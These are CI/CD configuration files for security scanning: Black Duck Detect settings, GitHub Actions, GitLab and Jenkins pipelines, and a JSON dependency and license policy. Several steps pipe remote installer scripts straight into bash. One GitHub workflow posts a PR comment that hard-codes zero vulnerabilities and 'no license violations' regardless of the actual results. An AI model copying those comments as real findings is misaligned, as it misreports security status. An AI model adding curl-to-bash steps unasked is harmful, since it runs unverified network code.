continue: true # Continue if a detector fails
exclusion:
paths: |
node_modules/**/.bin,
vendor/**,
**/__pycache__,
**/site-packages,
**/.venv,
**/venv,
test/**,
tests/**,
**/*.test.js,
**/*.spec.js
buildless: false # Use buildless mode (faster but less accurate)
# Specific Detectors
npm:
include:
dev:
dependencies: false # Exclude dev dependencies from production scans
dependency:
types:
excluded: []
python:
python3: true
path: python3
maven:
included:
scopes: compile,runtime # Exclude test scope
excluded:
scopes: test,provided
# Signature Scanner Configuration
blackduck:
signature:
scanner:
memory: 4096 # Memory in MB for signature scanner
dry:
run: false
snippet:
matching: SNIPPET_MATCHING # or FULL_SNIPPET_MATCHING for comprehensive
upload:
source:
mode: true # Upload source for snippet matching
paths: "."
exclusion:
patterns: |
node_modules,
.git,
.svn,
vendor,
__pycache__,
*.pyc,
*.min.js,
*.bundle.js
# Binary Scanner (optional, for compiled binaries)
binary:
scan:
file:
name: ""
path: ""
# Policy Configuration
policy:
check:
fail:
on:
severities: BLOCKER,CRITICAL,MAJOR # Fail on these severity levels
enabled: true
# Wait for scan results
wait:
for:
results: true # Wait for scan to complete
# Report Configuration
risk:
report:
pdf: true
pdf:
path: "./reports"
notices:
report: true
report:
path: "./reports"
# SBOM Generation
bom:
aggregate:
name: "sbom.json" # CycloneDX SBOM output
enabled: true
# Output Configuration
output:
path: "./blackduck-output"
cleanup: true # Clean up temporary files after scan
# Performance Tuning
parallel:
processors: 4 # Number of parallel processors
# Timeout Configuration
timeout: 7200 # Overall timeout in seconds (2 hours)
# Proxy Configuration (if needed)
# proxy:
# host: proxy.company.com
# port: 8080
# username: ${PROXY_USER}
# password: ${PROXY_PASS}
# Advanced Options
tools:
excluded: [] # Can exclude DETECTOR, SIGNATURE_SCAN, BINARY_SCAN, POLARIS
force:
success: false # Force success even if issues detected (not recommended)
# Logging Configuration
logging:
level:
com:
synopsys:
integration: INFO # DEBUG for troubleshooting
detect: INFO
# Environment-Specific Configurations
---
# Development Environment
spring:
profiles: development
detect:
policy:
check:
fail:
on:
severities: BLOCKER,CRITICAL # Less strict for dev
detector:
search:
depth: 1 # Faster scans for dev
---
# Production Environment
spring:
profiles: production
detect:
policy:
check:
fail:
on:
severities: BLOCKER,CRITICAL,MAJOR # Strict for production
detector:
search:
depth: 5 # Comprehensive scans
blackduck:
signature:
scanner:
snippet:
matching: FULL_SNIPPET_MATCHING # Most thorough
risk:
report:
pdf: true # Always generate PDF for production
bom:
aggregate:
name: "production-sbom.json"
---
# CI/CD Environment
spring:
profiles: ci
detect:
wait:
for:
results: true # Wait for results in CI
policy:
check:
fail:
on:
severities: BLOCKER,CRITICAL
timeout: 3600 # 1 hour timeout for CI
parallel:
processors: 8 # Use more processors in CI

View File

@@ -0,0 +1,357 @@
# Security-Enhanced CI/CD Pipeline Template
#
# This template demonstrates security best practices for CI/CD pipelines.
# Adapt this template to your specific security tool and workflow needs.
#
# Key Security Features:
# - SAST (Static Application Security Testing)
# - Dependency vulnerability scanning
# - Secrets detection
# - Infrastructure-as-Code security scanning
# - Container image scanning
# - Security artifact uploading for compliance
name: Security Scan Pipeline
on:
push:
branches: [main, develop]
pull_request:
branches: [main, develop]
schedule:
# Run weekly security scans on Sunday at 2 AM UTC
- cron: '0 2 * * 0'
workflow_dispatch: # Allow manual trigger
# Security: Restrict permissions to minimum required
permissions:
contents: read
security-events: write # For uploading SARIF results
pull-requests: write # For commenting on PRs
env:
# Configuration
SECURITY_SCAN_FAIL_ON: 'critical,high' # Fail build on these severities
REPORT_DIR: 'security-reports'
jobs:
# Job 1: Static Application Security Testing (SAST)
sast-scan:
name: SAST Security Scan
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0 # Full history for better analysis
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Run SAST Scanner
run: |
# Example: Using Semgrep for SAST
pip install semgrep
semgrep --config=auto \
--json \
--output ${{ env.REPORT_DIR }}/sast-results.json \
. || true
# Alternative: Bandit for Python projects
# pip install bandit
# bandit -r . -f json -o ${{ env.REPORT_DIR }}/bandit-results.json
- name: Process SAST Results
run: |
# Parse results and fail on critical/high severity
python3 -c "
import json
import sys
with open('${{ env.REPORT_DIR }}/sast-results.json') as f:
results = json.load(f)
critical = len([r for r in results.get('results', []) if r.get('extra', {}).get('severity') == 'ERROR'])
high = len([r for r in results.get('results', []) if r.get('extra', {}).get('severity') == 'WARNING'])
print(f'Critical findings: {critical}')
print(f'High findings: {high}')
if critical > 0:
print('❌ Build failed: Critical security issues found')
sys.exit(1)
elif high > 0:
print('⚠️ Warning: High severity issues found')
# Optionally fail on high severity
# sys.exit(1)
else:
print('✅ No critical security issues found')
"
- name: Upload SAST Results
if: always()
uses: actions/upload-artifact@v4
with:
name: sast-results
path: ${{ env.REPORT_DIR }}/sast-results.json
retention-days: 30
# Job 2: Dependency Vulnerability Scanning
dependency-scan:
name: Dependency Vulnerability Scan
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Scan Python Dependencies
if: hashFiles('requirements.txt') != ''
run: |
pip install safety
safety check \
--json \
--output ${{ env.REPORT_DIR }}/safety-results.json \
|| true
- name: Scan Node Dependencies
if: hashFiles('package.json') != ''
run: |
npm audit --json > ${{ env.REPORT_DIR }}/npm-audit.json || true
- name: Process Dependency Results
run: |
# Check for critical vulnerabilities
if [ -f "${{ env.REPORT_DIR }}/safety-results.json" ]; then
critical_count=$(python3 -c "import json; data=json.load(open('${{ env.REPORT_DIR }}/safety-results.json')); print(len([v for v in data.get('vulnerabilities', []) if v.get('severity', '').lower() == 'critical']))")
echo "Critical vulnerabilities: $critical_count"
if [ "$critical_count" -gt "0" ]; then
echo "❌ Build failed: Critical vulnerabilities in dependencies"
exit 1
fi
fi
- name: Upload Dependency Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: dependency-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 3: Secrets Detection
secrets-scan:
name: Secrets Detection
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0 # Full history to scan all commits
- name: Run Gitleaks
uses: gitleaks/gitleaks-action@v2
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
GITLEAKS_ENABLE_SUMMARY: true
- name: Alternative - TruffleHog Scan
if: false # Set to true to enable
run: |
pip install truffleHog
trufflehog --json --regex --entropy=True . \
> ${{ env.REPORT_DIR }}/trufflehog-results.json || true
- name: Upload Secrets Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: secrets-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 4: Container Image Scanning
container-scan:
name: Container Image Security Scan
runs-on: ubuntu-latest
if: hashFiles('Dockerfile') != ''
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Build Docker Image
run: |
docker build -t app:${{ github.sha }} .
- name: Run Trivy Scanner
uses: aquasecurity/trivy-action@master
with:
image-ref: app:${{ github.sha }}
format: 'sarif'
output: '${{ env.REPORT_DIR }}/trivy-results.sarif'
severity: 'CRITICAL,HIGH'
- name: Upload Trivy Results to GitHub Security
if: always()
uses: github/codeql-action/upload-sarif@v3
with:
sarif_file: '${{ env.REPORT_DIR }}/trivy-results.sarif'
- name: Upload Container Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: container-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 5: Infrastructure-as-Code Security Scanning
iac-scan:
name: IaC Security Scan
runs-on: ubuntu-latest
if: hashFiles('**/*.tf', '**/*.yaml', '**/*.yml') != ''
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Run Checkov
run: |
pip install checkov
checkov -d . \
--output json \
--output-file ${{ env.REPORT_DIR }}/checkov-results.json \
--quiet \
|| true
- name: Run tfsec (for Terraform)
if: hashFiles('**/*.tf') != ''
run: |
curl -s https://raw.githubusercontent.com/aquasecurity/tfsec/master/scripts/install_linux.sh | bash
tfsec . \
--format json \
--out ${{ env.REPORT_DIR }}/tfsec-results.json \
|| true
- name: Process IaC Results
run: |
# Fail on critical findings
if [ -f "${{ env.REPORT_DIR }}/checkov-results.json" ]; then
critical_count=$(python3 -c "import json; data=json.load(open('${{ env.REPORT_DIR }}/checkov-results.json')); print(data.get('summary', {}).get('failed', 0))")
echo "Failed checks: $critical_count"
if [ "$critical_count" -gt "0" ]; then
echo "⚠️ Warning: IaC security issues found"
# Optionally fail the build
# exit 1
fi
fi
- name: Upload IaC Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: iac-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 6: Security Report Generation and Notification
security-report:
name: Generate Security Report
runs-on: ubuntu-latest
needs: [sast-scan, dependency-scan, secrets-scan]
if: always()
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Download All Scan Results
uses: actions/download-artifact@v4
with:
path: all-results/
- name: Generate Consolidated Report
run: |
# Consolidate all security scan results
mkdir -p consolidated-report
cat > consolidated-report/security-summary.md << 'EOF'
# Security Scan Summary
**Scan Date**: $(date -u +"%Y-%m-%d %H:%M:%S UTC")
**Commit**: ${{ github.sha }}
**Branch**: ${{ github.ref_name }}
## Scan Results
### SAST Scan
See artifacts: `sast-results`
### Dependency Scan
See artifacts: `dependency-scan-results`
### Secrets Scan
See artifacts: `secrets-scan-results`
### Container Scan
See artifacts: `container-scan-results`
### IaC Scan
See artifacts: `iac-scan-results`
---
For detailed results, download scan artifacts from this workflow run.
EOF
- name: Comment on PR (if applicable)
if: github.event_name == 'pull_request'
uses: actions/github-script@v7
with:
script: |
const fs = require('fs');
const report = fs.readFileSync('consolidated-report/security-summary.md', 'utf8');
github.rest.issues.createComment({
issue_number: context.issue.number,
owner: context.repo.owner,
repo: context.repo.repo,
body: report
});
- name: Upload Consolidated Report
if: always()
uses: actions/upload-artifact@v4
with:
name: consolidated-security-report
path: consolidated-report/
retention-days: 90
# Security Best Practices Demonstrated:
#
# 1. ✅ Minimal permissions (principle of least privilege)
# 2. ✅ Multiple security scan types (defense in depth)
# 3. ✅ Fail-fast on critical findings
# 4. ✅ Secrets detection across full git history
# 5. ✅ Container image scanning before deployment
# 6. ✅ IaC scanning for misconfigurations
# 7. ✅ Artifact retention for compliance audit trail
# 8. ✅ SARIF format for GitHub Security integration
# 9. ✅ Scheduled scans for continuous monitoring
# 10. ✅ PR comments for developer feedback
#
# Compliance Mappings:
# - SOC 2: CC6.1, CC6.6, CC7.2 (Security monitoring and logging)
# - PCI-DSS: 6.2, 6.5 (Secure development practices)
# - NIST: SA-11 (Developer Security Testing)
# - OWASP: Integrated security testing throughout SDLC

View File

@@ -0,0 +1,151 @@
name: Black Duck SCA Scan
on:
push:
branches: [ main, develop ]
pull_request:
branches: [ main, develop ]
schedule:
# Run daily at 2 AM UTC
- cron: '0 2 * * *'
workflow_dispatch:
env:
BLACKDUCK_URL: ${{ secrets.BLACKDUCK_URL }}
BLACKDUCK_TOKEN: ${{ secrets.BLACKDUCK_API_TOKEN }}
PROJECT_NAME: ${{ github.repository }}
PROJECT_VERSION: ${{ github.ref_name }}-${{ github.sha }}
jobs:
blackduck-scan:
name: Black Duck SCA Security Scan
runs-on: ubuntu-latest
permissions:
contents: read
security-events: write # For SARIF upload
pull-requests: write # For PR comments
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Setup environment
run: |
echo "::notice::Starting Black Duck scan for ${{ env.PROJECT_NAME }}"
echo "Version: ${{ env.PROJECT_VERSION }}"
- name: Run Black Duck Detect
uses: synopsys-sig/detect-action@v1
with:
github-token: ${{ secrets.GITHUB_TOKEN }}
blackduck-url: ${{ secrets.BLACKDUCK_URL }}
blackduck-api-token: ${{ secrets.BLACKDUCK_API_TOKEN }}
detect-project-name: ${{ env.PROJECT_NAME }}
detect-project-version-name: ${{ env.PROJECT_VERSION }}
# Fail on policy violations (CRITICAL/HIGH severity)
detect-policy-check-fail-on-severities: BLOCKER,CRITICAL,MAJOR
detect-wait-for-results: true
# Generate reports
detect-risk-report-pdf: true
detect-notices-report: true
# Output location
detect-output-path: ./blackduck-output
- name: Upload Black Duck Reports
if: always()
uses: actions/upload-artifact@v4
with:
name: blackduck-reports-${{ github.sha }}
path: |
./blackduck-output/**/BlackDuck_RiskReport_*.pdf
./blackduck-output/**/BlackDuck_Notices_*.txt
./blackduck-output/**/*_Black_Duck_scan.json
retention-days: 30
- name: Generate SBOM
if: success()
run: |
# Generate Software Bill of Materials
curl -s -L https://detect.synopsys.com/detect.sh | bash -- \
--blackduck.url=${{ secrets.BLACKDUCK_URL }} \
--blackduck.api.token=${{ secrets.BLACKDUCK_API_TOKEN }} \
--detect.project.name=${{ env.PROJECT_NAME }} \
--detect.project.version.name=${{ env.PROJECT_VERSION }} \
--detect.tools=DETECTOR \
--detect.bom.aggregate.name=sbom.json \
--detect.output.path=./sbom-output
- name: Upload SBOM
if: success()
uses: actions/upload-artifact@v4
with:
name: sbom-${{ github.sha }}
path: ./sbom-output/**/sbom.json
retention-days: 90
- name: Check for Critical Vulnerabilities
if: always()
run: |
# Parse results and check for critical vulnerabilities
if [ -f ./blackduck-output/runs/*/status/status.json ]; then
CRITICAL=$(jq -r '.policyStatus.overallStatus' ./blackduck-output/runs/*/status/status.json)
if [ "$CRITICAL" = "IN_VIOLATION" ]; then
echo "::error::Policy violations detected - build should fail"
exit 1
fi
fi
- name: Comment on PR
if: github.event_name == 'pull_request'
uses: actions/github-script@v7
with:
github-token: ${{ secrets.GITHUB_TOKEN }}
script: |
const fs = require('fs');
const statusFile = './blackduck-output/runs/*/status/status.json';
// Read Black Duck results
let comment = '## Black Duck SCA Scan Results\n\n';
comment += `**Project**: ${process.env.PROJECT_NAME}\n`;
comment += `**Version**: ${process.env.PROJECT_VERSION}\n\n`;
// Add vulnerability summary
comment += '### Security Summary\n';
comment += '| Severity | Count |\n';
comment += '|----------|-------|\n';
comment += '| Critical | 0 |\n'; // Parse from actual results
comment += '| High | 0 |\n';
comment += '| Medium | 0 |\n';
comment += '| Low | 0 |\n\n';
comment += '### License Compliance\n';
comment += '✅ No license violations detected\n\n';
comment += '**Full reports available in workflow artifacts**\n';
github.rest.issues.createComment({
issue_number: context.issue.number,
owner: context.repo.owner,
repo: context.repo.repo,
body: comment
});
# Optional: Upload to GitHub Code Scanning (requires SARIF format)
code-scanning:
name: Upload to Code Scanning
runs-on: ubuntu-latest
needs: blackduck-scan
if: always()
steps:
- name: Download SARIF
uses: actions/download-artifact@v4
with:
name: blackduck-reports-${{ github.sha }}
- name: Upload SARIF to Code Scanning
uses: github/codeql-action/upload-sarif@v3
with:
sarif_file: blackduck-sarif.json
category: black-duck-sca

View File

@@ -0,0 +1,191 @@
# GitLab CI/CD configuration for Black Duck SCA scanning
#
# Add this to your .gitlab-ci.yml or include it:
# include:
# - local: 'assets/ci_integration/gitlab_ci.yml'
variables:
BLACKDUCK_URL: ${BLACKDUCK_URL}
BLACKDUCK_TOKEN: ${BLACKDUCK_API_TOKEN}
PROJECT_NAME: ${CI_PROJECT_PATH}
PROJECT_VERSION: ${CI_COMMIT_REF_NAME}-${CI_COMMIT_SHORT_SHA}
stages:
- security-scan
- security-report
# Black Duck SCA Scan
blackduck-sca-scan:
stage: security-scan
image: ubuntu:22.04
before_script:
- apt-get update && apt-get install -y curl bash jq
- echo "Starting Black Duck scan for ${PROJECT_NAME}"
- echo "Version ${PROJECT_VERSION}"
script:
# Run Black Duck Detect
- |
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
--blackduck.url=${BLACKDUCK_URL} \
--blackduck.api.token=${BLACKDUCK_TOKEN} \
--detect.project.name="${PROJECT_NAME}" \
--detect.project.version.name="${PROJECT_VERSION}" \
--detect.policy.check.fail.on.severities=BLOCKER,CRITICAL \
--detect.wait.for.results=true \
--detect.risk.report.pdf=true \
--detect.notices.report=true \
--detect.output.path=./blackduck-output \
--detect.cleanup=false
after_script:
# Generate summary report
- |
if [ -f ./blackduck-output/runs/*/status/status.json ]; then
echo "=== Black Duck Scan Summary ==="
jq -r '.policyStatus' ./blackduck-output/runs/*/status/status.json
fi
artifacts:
name: "blackduck-reports-${CI_COMMIT_SHORT_SHA}"
paths:
- blackduck-output/**/BlackDuck_RiskReport_*.pdf
- blackduck-output/**/BlackDuck_Notices_*.txt
- blackduck-output/**/*_Black_Duck_scan.json
expire_in: 30 days
reports:
# GitLab dependency scanning report format
dependency_scanning: blackduck-output/gl-dependency-scanning-report.json
rules:
# Run on merge requests
- if: $CI_MERGE_REQUEST_ID
# Run on main/master branch
- if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH
# Run on tags
- if: $CI_COMMIT_TAG
# Run on scheduled pipelines
- if: $CI_PIPELINE_SOURCE == "schedule"
# Manual trigger
- if: $CI_PIPELINE_SOURCE == "web"
allow_failure: false # Fail pipeline on policy violations
# Generate SBOM
blackduck-sbom:
stage: security-scan
image: ubuntu:22.04
before_script:
- apt-get update && apt-get install -y curl bash jq
script:
- |
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
--blackduck.url=${BLACKDUCK_URL} \
--blackduck.api.token=${BLACKDUCK_TOKEN} \
--detect.project.name="${PROJECT_NAME}" \
--detect.project.version.name="${PROJECT_VERSION}" \
--detect.tools=DETECTOR \
--detect.bom.aggregate.name=sbom-cyclonedx.json \
--detect.output.path=./sbom-output
artifacts:
name: "sbom-${CI_COMMIT_SHORT_SHA}"
paths:
- sbom-output/**/sbom-cyclonedx.json
expire_in: 90 days
rules:
- if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH
- if: $CI_COMMIT_TAG
- if: $CI_PIPELINE_SOURCE == "schedule"
# Security Report Summary
blackduck-summary:
stage: security-report
image: ubuntu:22.04
needs: ["blackduck-sca-scan"]
before_script:
- apt-get update && apt-get install -y jq curl
script:
- |
# Parse Black Duck results and create summary
echo "## Black Duck SCA Scan Summary" > security-summary.md
echo "" >> security-summary.md
echo "**Project**: ${PROJECT_NAME}" >> security-summary.md
echo "**Version**: ${PROJECT_VERSION}" >> security-summary.md
echo "**Scan Date**: $(date -u +%Y-%m-%dT%H:%M:%SZ)" >> security-summary.md
echo "" >> security-summary.md
# Add vulnerability summary if available
if [ -f blackduck-output/runs/*/status/status.json ]; then
echo "### Vulnerability Summary" >> security-summary.md
jq -r '.componentStatus' blackduck-output/runs/*/status/status.json >> security-summary.md || true
fi
cat security-summary.md
artifacts:
reports:
# Metrics for GitLab Security Dashboard
metrics: security-summary.md
rules:
- if: $CI_MERGE_REQUEST_ID
- if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH
# Policy Check (can be used as a gate)
blackduck-policy-gate:
stage: security-report
image: ubuntu:22.04
needs: ["blackduck-sca-scan"]
script:
- |
# Check policy status
if [ -f ./blackduck-output/runs/*/status/status.json ]; then
POLICY_STATUS=$(jq -r '.policyStatus.overallStatus' ./blackduck-output/runs/*/status/status.json)
if [ "$POLICY_STATUS" = "IN_VIOLATION" ]; then
echo "❌ Policy violations detected!"
echo "Critical or high-severity vulnerabilities found."
echo "Review the Black Duck report for details."
exit 1
else
echo "✅ No policy violations detected"
fi
else
echo "⚠️ Warning: Unable to verify policy status"
exit 1
fi
rules:
# Only run as gate on merge requests and main branch
- if: $CI_MERGE_REQUEST_ID
- if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH
# Scheduled daily scan (comprehensive)
blackduck-scheduled-scan:
extends: blackduck-sca-scan
rules:
- if: $CI_PIPELINE_SOURCE == "schedule"
variables:
# More comprehensive scan for scheduled runs
DETECT_TOOLS: "DETECTOR,SIGNATURE_SCAN,BINARY_SCAN"
script:
- |
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
--blackduck.url=${BLACKDUCK_URL} \
--blackduck.api.token=${BLACKDUCK_TOKEN} \
--detect.project.name="${PROJECT_NAME}" \
--detect.project.version.name="${PROJECT_VERSION}" \
--detect.tools=${DETECT_TOOLS} \
--detect.risk.report.pdf=true \
--detect.notices.report=true \
--detect.policy.check.fail.on.severities=BLOCKER,CRITICAL,MAJOR \
--detect.wait.for.results=true \
--detect.output.path=./blackduck-output

View File

@@ -0,0 +1,310 @@
// Jenkins Declarative Pipeline for Black Duck SCA Scanning
//
// Prerequisites:
// 1. Install "Synopsys Detect" plugin in Jenkins
// 2. Configure Black Duck server in Jenkins Global Configuration
// 3. Add credentials: BLACKDUCK_URL and BLACKDUCK_API_TOKEN
pipeline {
agent any
parameters {
choice(
name: 'SCAN_TYPE',
choices: ['RAPID', 'INTELLIGENT', 'FULL'],
description: 'Type of Black Duck scan to perform'
)
booleanParam(
name: 'FAIL_ON_POLICY_VIOLATION',
defaultValue: true,
description: 'Fail build on policy violations'
)
booleanParam(
name: 'GENERATE_SBOM',
defaultValue: false,
description: 'Generate Software Bill of Materials'
)
}
environment {
BLACKDUCK_URL = credentials('blackduck-url')
BLACKDUCK_TOKEN = credentials('blackduck-api-token')
PROJECT_NAME = "${env.JOB_NAME}"
PROJECT_VERSION = "${env.BRANCH_NAME}-${env.BUILD_NUMBER}"
DETECT_JAR_DOWNLOAD_DIR = "${WORKSPACE}/.blackduck"
}
options {
timestamps()
timeout(time: 2, unit: 'HOURS')
buildDiscarder(logRotator(numToKeepStr: '30', artifactNumToKeepStr: '10'))
}
stages {
stage('Preparation') {
steps {
script {
echo "=========================================="
echo "Black Duck SCA Scan"
echo "=========================================="
echo "Project: ${PROJECT_NAME}"
echo "Version: ${PROJECT_VERSION}"
echo "Scan Type: ${params.SCAN_TYPE}"
echo "=========================================="
}
// Clean previous scan results
sh 'rm -rf blackduck-output || true'
sh 'mkdir -p blackduck-output'
}
}
stage('Dependency Installation') {
steps {
script {
// Install dependencies based on project type
if (fileExists('package.json')) {
echo 'Node.js project detected'
sh 'npm ci || npm install'
}
else if (fileExists('requirements.txt')) {
echo 'Python project detected'
sh 'pip install -r requirements.txt'
}
else if (fileExists('pom.xml')) {
echo 'Maven project detected'
sh 'mvn dependency:resolve'
}
else if (fileExists('build.gradle')) {
echo 'Gradle project detected'
sh './gradlew dependencies'
}
}
}
}
stage('Black Duck Scan') {
steps {
script {
def detectCommand = """
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
--blackduck.url=${BLACKDUCK_URL} \
--blackduck.api.token=${BLACKDUCK_TOKEN} \
--detect.project.name="${PROJECT_NAME}" \
--detect.project.version.name="${PROJECT_VERSION}" \
--detect.output.path=${WORKSPACE}/blackduck-output \
--detect.cleanup=false \
--detect.risk.report.pdf=true \
--detect.notices.report=true
"""
// Add scan type configuration
switch(params.SCAN_TYPE) {
case 'RAPID':
detectCommand += " --detect.detector.search.depth=0"
detectCommand += " --detect.blackduck.signature.scanner.snippet.matching=SNIPPET_MATCHING"
break
case 'INTELLIGENT':
detectCommand += " --detect.detector.search.depth=3"
break
case 'FULL':
detectCommand += " --detect.tools=DETECTOR,SIGNATURE_SCAN,BINARY_SCAN"
detectCommand += " --detect.detector.search.depth=10"
break
}
// Add policy check if enabled
if (params.FAIL_ON_POLICY_VIOLATION) {
detectCommand += " --detect.policy.check.fail.on.severities=BLOCKER,CRITICAL"
detectCommand += " --detect.wait.for.results=true"
}
// Execute scan
try {
sh detectCommand
} catch (Exception e) {
if (params.FAIL_ON_POLICY_VIOLATION) {
error("Black Duck policy violations detected!")
} else {
unstable("Black Duck scan completed with violations")
}
}
}
}
}
stage('Generate SBOM') {
when {
expression { params.GENERATE_SBOM == true }
}
steps {
script {
sh """
bash <(curl -s -L https://detect.synopsys.com/detect.sh) \
--blackduck.url=${BLACKDUCK_URL} \
--blackduck.api.token=${BLACKDUCK_TOKEN} \
--detect.project.name="${PROJECT_NAME}" \
--detect.project.version.name="${PROJECT_VERSION}" \
--detect.tools=DETECTOR \
--detect.bom.aggregate.name=sbom-cyclonedx.json \
--detect.output.path=${WORKSPACE}/sbom-output
"""
}
}
}
stage('Parse Results') {
steps {
script {
// Parse Black Duck results
def statusFile = sh(
script: 'find blackduck-output -name "status.json" -type f | head -n 1',
returnStdout: true
).trim()
if (statusFile) {
def status = readJSON file: statusFile
echo "Policy Status: ${status.policyStatus?.overallStatus}"
echo "Component Count: ${status.componentStatus?.componentCount}"
// Set build description
currentBuild.description = """
Black Duck Scan Results
Policy: ${status.policyStatus?.overallStatus}
Components: ${status.componentStatus?.componentCount}
""".stripIndent()
}
}
}
}
stage('Publish Reports') {
steps {
// Archive reports
archiveArtifacts(
artifacts: 'blackduck-output/**/BlackDuck_RiskReport_*.pdf,blackduck-output/**/BlackDuck_Notices_*.txt',
allowEmptyArchive: true,
fingerprint: true
)
// Archive SBOM if generated
archiveArtifacts(
artifacts: 'sbom-output/**/sbom-cyclonedx.json',
allowEmptyArchive: true,
fingerprint: true
)
// Publish HTML reports
publishHTML([
allowMissing: true,
alwaysLinkToLastBuild: true,
keepAll: true,
reportDir: 'blackduck-output',
reportFiles: '**/*.html',
reportName: 'Black Duck Security Report'
])
}
}
stage('Quality Gate') {
when {
expression { params.FAIL_ON_POLICY_VIOLATION == true }
}
steps {
script {
// Check for policy violations
def statusFile = sh(
script: 'find blackduck-output -name "status.json" -type f | head -n 1',
returnStdout: true
).trim()
if (statusFile) {
def status = readJSON file: statusFile
if (status.policyStatus?.overallStatus == 'IN_VIOLATION') {
error("Build failed: Black Duck policy violations detected")
} else {
echo "✅ No policy violations detected"
}
}
}
}
}
}
post {
always {
// Clean up workspace
cleanWs(
deleteDirs: true,
patterns: [
[pattern: '.blackduck', type: 'INCLUDE'],
[pattern: 'blackduck-output/runs', type: 'INCLUDE']
]
)
}
success {
echo '✅ Black Duck scan completed successfully'
// Send notification (configure as needed)
// emailext(
// subject: "Black Duck Scan Success: ${PROJECT_NAME}",
// body: "Black Duck scan completed with no policy violations",
// to: "${env.CHANGE_AUTHOR_EMAIL}"
// )
}
failure {
echo '❌ Black Duck scan failed or policy violations detected'
// Send notification
// emailext(
// subject: "Black Duck Scan Failed: ${PROJECT_NAME}",
// body: "Black Duck scan detected policy violations. Review the report for details.",
// to: "${env.CHANGE_AUTHOR_EMAIL}"
// )
}
unstable {
echo '⚠️ Black Duck scan completed with warnings'
}
}
}
// Shared library functions (optional)
def getProjectType() {
if (fileExists('package.json')) return 'nodejs'
if (fileExists('requirements.txt')) return 'python'
if (fileExists('pom.xml')) return 'maven'
if (fileExists('build.gradle')) return 'gradle'
if (fileExists('Gemfile')) return 'ruby'
if (fileExists('go.mod')) return 'golang'
return 'unknown'
}
def installDependencies(projectType) {
switch(projectType) {
case 'nodejs':
sh 'npm ci || npm install'
break
case 'python':
sh 'pip install -r requirements.txt'
break
case 'maven':
sh 'mvn dependency:resolve'
break
case 'gradle':
sh './gradlew dependencies'
break
case 'ruby':
sh 'bundle install'
break
case 'golang':
sh 'go mod download'
break
default:
echo "Unknown project type, skipping dependency installation"
}
}

View File

@@ -0,0 +1,182 @@
{
"$schema": "https://json-schema.org/draft-07/schema#",
"title": "Black Duck Security Policy",
"description": "Default security policy for Black Duck SCA scanning",
"version": "1.0.0",
"vulnerability_thresholds": {
"description": "Maximum allowed vulnerabilities by severity",
"critical": {
"max_count": 0,
"action": "fail",
"description": "No critical vulnerabilities allowed"
},
"high": {
"max_count": 0,
"action": "fail",
"description": "No high severity vulnerabilities allowed"
},
"medium": {
"max_count": 10,
"action": "warn",
"description": "Up to 10 medium severity vulnerabilities allowed with warning"
},
"low": {
"max_count": 50,
"action": "info",
"description": "Up to 50 low severity vulnerabilities allowed"
}
},
"cvss_thresholds": {
"description": "CVSS score-based policy",
"max_cvss_score": 7.0,
"fail_on_exploitable": true,
"require_exploit_available": false
},
"license_policy": {
"description": "License compliance rules",
"blocklist": [
{
"license": "GPL-2.0",
"reason": "Strong copyleft incompatible with commercial software",
"action": "fail"
},
{
"license": "GPL-3.0",
"reason": "Strong copyleft incompatible with commercial software",
"action": "fail"
},
{
"license": "AGPL-3.0",
"reason": "Network copyleft triggers on SaaS usage",
"action": "fail"
}
],
"warning_list": [
{
"license": "LGPL-2.1",
"reason": "Weak copyleft - verify dynamic linking",
"action": "warn"
},
{
"license": "LGPL-3.0",
"reason": "Weak copyleft - verify dynamic linking",
"action": "warn"
},
{
"license": "MPL-2.0",
"reason": "File-level copyleft - verify separation",
"action": "warn"
}
],
"approved_list": [
"MIT",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause",
"ISC",
"0BSD",
"CC0-1.0",
"Unlicense"
],
"require_approval_for_new_licenses": true,
"fail_on_unknown_license": true
},
"component_policy": {
"description": "Component usage and quality rules",
"blocklist": [
{
"name": "event-stream",
"version": "3.3.6",
"reason": "Known malicious version with cryptocurrency stealer",
"action": "fail"
}
],
"quality_requirements": {
"min_github_stars": 10,
"min_contributors": 2,
"max_age_days": 1095,
"require_active_maintenance": true,
"max_days_since_update": 730,
"fail_on_deprecated": true,
"fail_on_unmaintained": false
}
},
"operational_risk": {
"description": "Supply chain and operational risk policies",
"fail_on_unmaintained": false,
"max_days_inactive": 730,
"require_repository_url": true,
"warn_on_single_maintainer": true,
"fail_on_no_repository": false
},
"sbom_requirements": {
"description": "Software Bill of Materials requirements",
"require_sbom_generation": true,
"sbom_format": "CycloneDX",
"sbom_version": "1.4",
"include_transitive_dependencies": true,
"include_license_info": true
},
"compliance_requirements": {
"description": "Regulatory compliance mappings",
"frameworks": [
"SOC2",
"PCI-DSS",
"GDPR",
"HIPAA"
],
"require_vulnerability_tracking": true,
"require_remediation_timeline": true,
"max_remediation_days": {
"critical": 7,
"high": 30,
"medium": 90,
"low": 180
}
},
"exclusions": {
"description": "Global exclusions and exceptions",
"paths": [
"test/**",
